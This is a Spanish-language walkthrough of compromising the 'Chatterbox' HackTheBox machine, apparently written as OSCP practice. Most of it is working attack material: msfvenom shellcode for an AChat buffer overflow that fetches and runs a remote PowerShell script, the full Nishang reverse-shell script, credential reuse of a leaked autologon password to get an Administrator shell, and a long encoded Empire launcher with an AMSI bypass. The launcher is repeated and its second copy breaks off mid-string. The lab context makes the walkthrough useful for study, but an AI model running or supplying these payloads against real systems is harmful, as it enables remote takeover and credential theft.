Esta ha sido una de las boxes más complejas que he hecho. Sobretodo porque no tengo tanta experiencia en windows.
Como siempre empezamos con un Nmap
root@Kali2:~# nmap -p 9255,9256 -sC -sV 10.10.10.74 Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-25 16:11 CEST Nmap scan report for 10.10.10.74 Host is up (0.33s latency). PORT STATE SERVICE VERSION 9255/tcp open http AChat chat system httpd |_http-server-header: AChat |_http-title: Site doesn't have a title. 9256/tcp open achat AChat chat system Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
Luego como solo hay dos puertos y el punto de entrada es Achat
root@Kali2:~# searchsploit achat
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Podemos usar MSF o manual. Como esto es preparacion para OSCP será manual.
Copiamos el exploit
searchsploit -m 36025
A partir de ahora hay q modificar el payload y el targuet.
Para el payload queremos que se conecte conmigo y baje (usando SimpleHtmlServer) una reverse shell de nishang. Obviamente tienes que ajustar esa shell y usar un listener.
root@Kali2:~/Desktop# msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/powershellreverse.ps1')\"" -e x86/unicode_mixed -b msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://<LABIP>/writeup.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 670 (iteration=0)
x86/unicode_mixed chosen with final size 670
Payload size: 670 bytes
Final size of python file: 3210 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x77\x78\x75\x32"
buf += "\x69\x70\x39\x70\x39\x70\x53\x30\x64\x49\x47\x75\x6c"
buf += "\x71\x67\x50\x43\x34\x64\x4b\x70\x50\x70\x30\x42\x6b"
buf += "\x70\x52\x7a\x6c\x54\x4b\x71\x42\x6d\x44\x62\x6b\x72"
buf += "\x52\x4c\x68\x6c\x4f\x75\x67\x4f\x5a\x4f\x36\x6c\x71"
buf += "\x39\x6f\x76\x4c\x4d\x6c\x63\x31\x51\x6c\x79\x72\x4e"
buf += "\x4c\x6f\x30\x55\x71\x66\x6f\x5a\x6d\x39\x71\x48\x47"
buf += "\x48\x62\x5a\x52\x4f\x62\x50\x57\x42\x6b\x72\x32\x5a"
buf += "\x70\x44\x4b\x30\x4a\x4f\x4c\x34\x4b\x30\x4c\x4b\x61"
buf += "\x31\x68\x37\x73\x4e\x68\x4a\x61\x56\x71\x30\x51\x32"
buf += "\x6b\x4f\x69\x4f\x30\x5a\x61\x38\x53\x54\x4b\x6f\x59"
buf += "\x4c\x58\x69\x53\x4e\x5a\x30\x49\x54\x4b\x6e\x54\x34"
buf += "\x4b\x6a\x61\x66\x76\x4d\x61\x49\x6f\x36\x4c\x66\x61"
buf += "\x66\x6f\x4c\x4d\x69\x71\x75\x77\x6f\x48\x67\x70\x63"
buf += "\x45\x6c\x36\x39\x73\x73\x4d\x69\x68\x4f\x4b\x43\x4d"
buf += "\x4c\x64\x30\x75\x69\x54\x71\x48\x74\x4b\x70\x58\x6d"
buf += "\x54\x79\x71\x56\x73\x43\x36\x54\x4b\x4a\x6c\x4e\x6b"
buf += "\x62\x6b\x32\x38\x6d\x4c\x6b\x51\x76\x73\x72\x6b\x6d"
buf += "\x34\x44\x4b\x4b\x51\x56\x70\x71\x79\x4d\x74\x6c\x64"
buf += "\x6c\x64\x51\x4b\x61\x4b\x71\x51\x70\x59\x6e\x7a\x50"
buf += "\x51\x4b\x4f\x47\x70\x31\x4f\x31\x4f\x4f\x6a\x74\x4b"
buf += "\x5a\x72\x38\x6b\x62\x6d\x31\x4d\x71\x5a\x4d\x31\x34"
buf += "\x4d\x53\x55\x68\x32\x39\x70\x79\x70\x39\x70\x42\x30"
buf += "\x62\x48\x6e\x51\x72\x6b\x72\x4f\x32\x67\x49\x6f\x37"
buf += "\x65\x75\x6b\x6a\x50\x65\x65\x66\x42\x31\x46\x70\x68"
buf += "\x43\x76\x62\x75\x75\x6d\x55\x4d\x59\x6f\x76\x75\x6d"
buf += "\x6c\x4c\x46\x51\x6c\x6b\x5a\x45\x30\x39\x6b\x57\x70"
buf += "\x63\x45\x69\x75\x75\x6b\x71\x37\x4e\x33\x64\x32\x50"
buf += "\x6f\x52\x4a\x69\x70\x42\x33\x4b\x4f\x7a\x35\x54\x30"
buf += "\x52\x4f\x73\x47\x33\x35\x30\x72\x51\x63\x31\x58\x4f"
buf += "\x75\x50\x6c\x30\x6c\x4b\x70\x4f\x32\x30\x49\x50\x45"
buf += "\x72\x38\x4f\x38\x70\x4e\x42\x45\x52\x57\x6e\x4d\x30"
buf += "\x4f\x62\x42\x70\x6a\x63\x35\x72\x43\x74\x34\x6f\x30"
buf += "\x50\x4e\x51\x55\x32\x54\x6c\x6e\x30\x57\x30\x65\x70"
buf += "\x62\x4f\x53\x30\x6c\x43\x39\x72\x45\x72\x4e\x30\x74"
buf += "\x4d\x59\x4c\x6e\x61\x54\x62\x4f\x31\x67\x50\x6e\x70"
buf += "\x6c\x72\x4f\x33\x31\x62\x44\x72\x33\x44\x34\x54\x32"
buf += "\x53\x39\x32\x4e\x43\x37\x4f\x38\x4b\x77\x6f\x78\x73"
buf += "\x44\x33\x44\x34\x30\x6f\x4a\x6c\x6f\x4c\x6f\x6f\x4c"
buf += "\x30\x4c\x6f\x51\x70\x42\x61\x39\x30\x50\x4d\x6e\x4c"
buf += "\x6f\x44\x37\x34\x32\x33\x39\x61\x64\x4f\x75\x53\x45"
buf += "\x62\x50\x6c\x6e\x54\x30\x30\x73\x70\x31\x4b\x77\x6d"
buf += "\x59\x4d\x52\x6d\x30\x41\x41"
Esto lo pegamos en el exploit.
Para la shell hay que agregar la última linea al github.
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.
.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
The script is derived from Powerfun written by Ben Turner & Dave Hardy
.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.
.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444
Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444
Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.
.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 1234
Ejecutamos el exploit
root@Kali2:~/Desktop# python 36025.py
---->{P00F}!
Y tenemos nuestro usuario
root@Kali2:~/Desktop# nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49167 Windows PowerShell running as user Alfred on CHATTERBOX Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami chatterbox\alfred
Corremos all checks
PS C:\Windows\system32> IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/PowerUpAllchecks.ps1')
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Intentaremos reutilizar credenciales, para eso checamos los usuarios
PS C:\Windows\system32> net users User accounts for \\CHATTERBOX ------------------------------------------------------------------------------- Administrator Alfred Guest The command completed successfully.
Ahora llamaremos a la misma reversehll con el puerto modificado usando el Administrator
PS C:\Windows\system32> $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS C:\Windows\system32> $creds = New-Object System.Management.Automation.PSCredential('Administrator',$passwd)
PS C:\Windows\system32> $creds
UserName Password
-------- --------
Administrator System.Security.SecureString
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.26/powershellreverse2.ps1')" -Credential $creds
Y listo
root@Kali2:~/Desktop# nc -nlvp 1235 listening on [any] 1235 ... connect to [10.10.14.26] from (UNKNOWN) [10.10.10.74] 49175 Windows PowerShell running as user Administrator on CHATTERBOX Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami chatterbox\administrator PS C:\Windows\system32>
Como alternativa podemos usar Empire. Primero Activamos el listener y obtenemos el powershell que ejecutara el agent. (bindip, port y host)
git clone https://github.com/EmpireProject/Empire
cd setup
./install.sh
cd ..
./empire
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
(Empire) > listeners
(Empire: listeners) > uselistener
dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True http://10.10.14.26:443 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True >yn+5G)k*%.8-b4BFZCS;~3c9,aX(wf< Staging key for initial agent negotiation.
BindIP True 10.10.14.26 The IP to bind to on the control server.
Port True 443 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners/http) >
agents back creds execute exit help info launcher listeners main resource set unset
(Empire: listeners/http) > launcher
[!] Please enter 'launcher <language>'
(Empire: listeners/http) > launcher powershell
powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAG8ATABsAEUAQwBUAEkAbwBOAHMALgBHAGUAbgBlAHIAaQBjAC4ARABpAEMAdABJAE8AbgBBAFIAeQBbAFMAVAByAEkATgBnACwAUwB5AFMAdABlAE0ALgBPAEIASgBlAGMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIAbABvAGMASwBdAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAEwAdQBlACgAJABuAFUATABsACwAKABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAQwBvAGwATABFAGMAVABpAE8AbgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAkAHQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFMAZQBSAFYASQBjAEUAUABPAEkATgB0AE0AQQBuAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AdABJAG4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBTAHQARQBNAC4ATgBlAHQALgBXAGUAQgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgAZQBhAEQAZQByAFMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAeQA9AFsAUwB5AHMAVABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBxAFUAZQBTAHQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwB4AHkAOwAkAFcAYwAuAFAAcgBvAHgAWQAuAEMAcgBlAGQARQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAWQBTAHQAZQBNAC4ATgBFAHQALgBDAHIARQBEAGUAbgBUAGkAQQBMAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAFUAbABUAE4ARQB0AHcAbwBSAEsAQwByAEUAZABlAG4AVABJAEEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABlAE0ALgBUAGUAeAB0AC4ARQBuAEMAbwBkAGkATgBHAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AEUAUwAoACcAPgB5AG4AKwA1AEcAKQBrACoAJQAuADgALQBiADQAQgBGAFoAQwBTADsAfgAzAGMAOQAsAGEAWAAoAHcAZgA8ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA2ADoANAA0ADMAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEAZABlAHIAUwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ALwA4AHIAawBUAGUAbABBAEgAUABNAGcATwBWAHYAeABiADcAYgB2ADUAVQBlAHEATwBXAFkAPQAiACkAOwAkAEQAYQB0AGEAPQAkAFcAQwAuAEQAbwB3AG4AbABPAEEARABEAEEAdABBACgAJABTAEUAcgArACQAVAApADsAJABpAFYAPQAkAGQAQQB0AGEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAQQBUAGEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAFQAaABdADsALQBKAG8AaQBOAFsAQwBoAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
(Empire: listeners/http) >
Copiamos todo el y lo usaremos en vez de nuestra reverse shell.
powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8ATgBUAGEAYgBsAEUALgBQAFMAVgBFAHIAUwBpAG8ATgAuAE0AQQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBlAGYAXQAuAEEAUwBTAGUAbQBiAEwAWQAuAEcAZQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAGUAdABWAEEATABVAGUAKAAkAE4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAG8ATABsAEUAQwBUAEkAbwBOAHMALgBHAGUAbgBlAHIAaQBjAC4ARABpAEMAdABJAE8AbgBBAFIAeQBbAFMAVAByAEkATgBnACwAUwB5AFMAdABlAE0ALgBPAEIASgBlAGMAdABdAF0AOgA6AG4ARQBXACgAKQA7ACQAdgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAQwByAEkAUABUAEIAbABvAGMASwBdAC4AIgBHAGUAVABGAGkARQBgAGwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAFQAVgBhAEwAdQBlACgAJABuAFUATABsACwAKABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAQwBvAGwATABFAGMAVABpAE8AbgBzAC4ARwBlAE4AZQBSAGkAYwAuAEgAQQBTAEgAUwBFAHQAWwBzAHQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAGYAXQAuAEEAUwBTAGUAbQBiAGwAWQAuAEcAZQBUAFQAWQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBlAHQARgBpAGUATABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwALAAkAHQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAdABlAE0ALgBOAEUAVAAuAFMAZQBSAFYASQBjAEUAUABPAEkATgB0AE0AQQBuAEEAZwBlAHIAXQA6ADoARQBYAFAARQBjAHQAMQAwADAAQwBvAE4AdABJAG4AdQBFAD0AMAA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBFAGMAdAAgAFMAeQBTAHQARQBNAC4ATgBlA